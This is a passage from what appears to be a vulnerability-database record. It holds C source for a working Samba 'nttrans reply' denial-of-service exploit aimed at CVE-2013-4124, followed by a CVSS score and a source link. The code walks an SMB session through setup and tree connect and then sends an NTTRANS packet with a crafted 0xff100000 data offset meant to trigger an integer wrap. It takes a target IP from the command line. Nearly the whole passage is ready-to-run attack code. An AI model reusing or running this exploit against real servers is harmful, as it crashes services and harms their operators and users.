sizeof (struct smb_base_header) +\r\n sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15;\r\n\r\n if ((packet = malloc(pktsize)) == NULL)\r\n { close(fd);\r\n fprintf(stderr, "malloc() failed, aborting!\\n");\r\n exit(-1);\r\n }\r\n\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_TCONX, 8, 1, 0, pid, uid, 1);\r\n construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n\r\n if ((size = write(fd, packet, pktsize)) == -1)\r\n { close(fd);\r\n fprintf(stderr, "write() failed, reason: '%s' (code %i)\\n", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n\r\n free(packet);\r\n\r\n if (size != pktsize)\r\n { close(fd);\r\n fprintf(stderr, "couldn't write entire packet, aborting!\\n");\r\n exit(-1);\r\n } \r\n}\r\n\r\nvoid process_tconx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct tconx_reply_header *tx_hdr;\r\n char packet[1024];\r\n int size, bytecount;\r\n \r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, "read() failed, reason: '%s' (code %i)\\n", strerror(errno), errno);\r\n exit(-errno);\r\n }\r\n\r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n\r\n memcpy(&tid, &base_hdr->tid, sizeof (uint16));\r\n memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16));\r\n\r\n printf("tree connect complete, got assigned tid %i\\n", tid);\r\n}\r\n\r\nvoid nttrans_request(int fd) { \r\n // packet = nbt session header + smb base header + nttrans header!\r\n char packet[sizeof (struct nbt_session_header) + \r\n sizeof (struct smb_base_header) + \r\n sizeof (struct nttrans_primary_request_header)];\r\n struct nttrans_primary_request_header nttrans_hdr; // nttrans header!\r\n int size=0;\r\n int function = SMB_NTTRANSCREATE; // NTTRANSCREATE!\r\n int totalparamcount = TOTALCOUNT;\r\n int totaldatacount = 0;\r\n uint8 setupcount = 0;\r\n\r\n memset(&nttrans_hdr, 0, sizeof nttrans_hdr);\r\n\r\n // construct nbt session header\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n // construct smb base header\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS, 8, 1, tid, pid, uid, 1);\r\n\r\n // construct nttrans header\r\n nttrans_hdr.paramoffset[0] = '\\x00';\r\n nttrans_hdr.paramoffset[1] = '\\x00';\r\n nttrans_hdr.paramoffset[2] = '\\x10';\r\n nttrans_hdr.paramoffset[3] = '\\xff';\r\n nttrans_hdr.dataoffset[0] = '\\x00'; // XXX data offset 0xff100000 to integer wrap\r\n nttrans_hdr.dataoffset[1] = '\\x00'; // the offset exploits the security bug of CVE-2013-4124\r\n nttrans_hdr.dataoffset[2] = '\\x10'; // samba remote dos\r\n nttrans_hdr.dataoffset[3] = '\\xff';\r\n\r\n nttrans_hdr.wordcount = 19 + setupcount;\r\n memcpy(&nttrans_hdr.function, &function, sizeof (uint16));\r\n memcpy(&nttrans_hdr.totalparamcount, &totalparamcount, sizeof (uint32));\r\n memcpy(&nttrans_hdr.totaldatacount, &totaldatacount, sizeof (uint32));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nttrans_hdr, sizeof nttrans_hdr);\r\n\r\n // send samba packet!\r\n size = write(fd, packet, sizeof (packet));\r\n close(fd);\r\n\r\n}\r\n\r\nstatic char banner[]={\r\n" ___ ___ \\n" \\\r\n" / _ \\\\ / _ \\\\ \\n" \\\r\n" __ __| (_) || | | | ___ \\n" \\\r\n" \\\\ \\\\/ / \\\\__. || | | | / __| \\n" \\\r\n" > < / / | |_| || (__ \\n" \\\r\n" /_/\\\\_\\\\ /_/ \\\\___/ \\\\___| \\n" \\\r\n};\r\n\r\nint main(int argc, char *argv[]) {\r\n int fd;\r\n struct sockaddr_in s_in;\r\n char target_ip[16];\r\n int smb_port=139;\r\n \r\n\r\n printf("%s\\n\\nsamba nttrans reply exploit\\n\\n", banner);\r\n\r\n if(argc < 2){\r\n fprintf(stderr, "samba nttrans reply exploit Usage:\\n\\n./samba_exploit [target ip addr]\\n\\n");\r\n exit(-1);\r\n }\r\n\r\n strncpy(target_ip, argv[1], 16);\r\n \r\n memset(&s_in, 0, sizeof (s_in));\r\n s_in.sin_family = AF_INET;\r\n s_in.sin_port = htons(smb_port); // samba port=139/tcp\r\n s_in.sin_addr.s_addr = inet_addr(target_ip);\r\n\r\n fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n connect(fd, (struct sockaddr *)&s_in, sizeof (s_in));\r\n\r\n // nbt(netbios over tcpip, nbtstat) session request\r\n nbt_session_request(fd, "BOSSA", "SAMBA"); // adjust computer names(clientname, servername)\r\n process_nbt_session_reply(fd);\r\n\r\n // protocol negotiation\r\n negprot_request(fd);\r\n process_negprot_reply(fd);\r\n \r\n // session setup\r\n sesssetupx_request(fd); // setup request\r\n process_sesssetupx_reply(fd); // setup reply\r\n\r\n // tree connection setup\r\n tconx_request(fd);\r\n process_tconx_reply(fd);\r\n\r\n // exploit!\r\n printf("[*] nttrans reply exploit!\\n");\r\n nttrans_request(fd);\r\n\r\n close(fd);\r\n\r\n return 0;\r\n}\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-81370"}]}
